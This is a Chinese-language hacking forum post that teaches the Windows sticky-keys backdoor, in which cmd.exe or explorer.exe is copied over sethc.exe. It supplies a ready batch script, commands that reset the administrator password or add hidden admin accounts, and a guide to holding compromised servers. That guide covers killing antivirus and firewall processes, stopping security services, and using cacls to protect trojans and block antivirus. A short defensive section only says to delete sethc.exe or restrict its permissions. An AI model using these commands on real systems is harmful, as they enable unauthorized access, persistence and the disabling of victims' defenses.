|
|
首先介绍一下sethc.exe入侵的原理吧:
sethc.exe就是win系统里自带的鸡肋功能,所谓的粘滞键, 哎 没一点P用
反而被一些所谓的黑客们,用来 在入侵别人服务器后 给服务器上装后门所用.
用COPY命令将cmd.exe复制为sethc.exe,这样在登陆界面是连按五下左SHIFT就可以调出我们可爱的CMD命令
窗口SHELL(系统权限)了!----------------------copy cmd.exe sethc.exe
最后重启后进入登陆介面...现在我们连续按五下左SHIFT..出现了个cmd命令窗口,它是shell(系统权
限)....
使用DOS命令:net user administrator 123456 就可以把管理员密码改成:123456了..试下使用123456就可
以登陆了!..
比如也可以利用CMD替换掉logon.scr等待屏保获得CMDSHELL也一种方法!
解决的方法:
很多人的服务器都被黑客入侵.并被利用了系统的这个漏洞做了后门,在这里我说一下在windows2003
server系统中这个后门的简单处理方法:
1.删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注
意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作
系统文件"的选择取消才能看得到).
2.使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的
sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐
藏受系统保护的操作系统文件"的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行
粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exeWindows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。
个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢
然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]
把sethc.exe文件的NTFS权限设置一下就安全了.
用shift键破解windows的登录密码.
首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员
当各位搞到一个shell,或者能远程执行命令之后,如何提权并保持肉鸡长期上线是一个难题。本人仅根据个人经验,旁敲侧击的谈几个常用命令,算是抛砖引玉,欢迎大家前来指导交流!
首先,提一下搞肉鸡,方法很多,1433、135、21,80、3389、4389,5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。
另外,说一下肉鸡的系统环境,一般都是服务器,所以杀毒软件、防火墙啥的相对来说还是比较牢固的,所以如何干扰并跳过这些保护也就是提权的关键。
最后,如何保持这个肉鸡长久上线,是目的所在,显然需要设置后门或者种植木马。
注:下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你,你留下了登陆等很多日志,呵呵);
常见命令, 如ipconfig、netstat等这儿不涉及,大家都会。
下面转入正文。
1.ver
作用:查看系统版本
实例:ver
说明:提权第一步就是查看这个是个人机器还是服务。
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。后面就好办了,给他中马的时候,首先本地测试,免杀,再种上去,防止中马不成功,或者留下查杀记录。(笨的办法可以直接停止杀毒软件,见后面命令。不过这样管理员就肯定知道自己中木马了,你长久控制肉鸡的目标也就要破碎了)。
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程啥的。因为它阻止你打开网络端口,或者以这台肉鸡为代理进行其他扫描、入侵啥的。当然,也可以结束杀毒软件等。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
实例: net stop net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone
说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurit ... 70bb001c958348.html)
7.&
作用:连续执行多个命令
实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。
注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。
8.echo y|
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com/it%5Fsecurit ... 0fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
说明:该重启的时候重启吧,一般开服务或者中马之后。
以上命令有些2000下可能无法运行,xp,2003下肯定ok。
后续,我再总结一下如何通过命令行来中马。
主要是通过ftp或者http下载或传输文件(完全命令行方式),同时也呼吁大家多共享自己得经验,共同提高。
|
|
江湖币
人气值
雷达卡
发表于 2011-12-5 09:57:58
提升卡
千斤顶
楼主
发表于 2011-12-5 15:44:01
发表于 2011-12-5 19:31:53
